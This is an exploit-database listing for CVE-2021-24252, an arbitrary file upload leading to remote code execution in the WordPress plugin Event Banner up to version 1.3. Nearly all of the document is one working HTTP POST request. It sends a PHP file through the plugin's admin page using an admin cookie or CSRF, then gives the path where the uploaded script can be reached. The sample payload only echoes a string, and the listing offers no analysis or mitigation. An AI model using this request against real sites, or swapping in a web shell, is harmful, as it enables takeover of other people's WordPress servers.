Exploit for Event Banner <= 1.3 - Arbitrary File Upload to RCE CVE-2021-24252

Name: Exploit for Event Banner <= 1.3 - Arbitrary File Upload to RCE CVE-2021-24252
Rating: 5 (80 reviews)

2021-04-10 | CVSS 6.5

## https://sploitus.com/exploit?id=WPEX-ID:91E81C6D-F24D-4F87-BC13-746715AF8F7C
POST /wp-admin/admin.php?page=free_event_banner HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------7244184083325323103017916780
Content-Length: 705
Connection: close
Cookie: [admin cookies/CSRF]
Upgrade-Insecure-Requests: 1

-----------------------------7244184083325323103017916780
Content-Disposition: form-data; name="image"; filename="134.php"
Content-Type: text/php

<?php echo 'FAILED'; ?>

-----------------------------7244184083325323103017916780
Content-Disposition: form-data; name="event[name]"

default
-----------------------------7244184083325323103017916780
Content-Disposition: form-data; name="event[date]"

def
-----------------------------7244184083325323103017916780
Content-Disposition: form-data; name="event[file]"


-----------------------------7244184083325323103017916780
Content-Disposition: form-data; name="save"

Save
-----------------------------7244184083325323103017916780--


The PHP file will be at https://example.com/wp-content/uploads/event_banner/def.php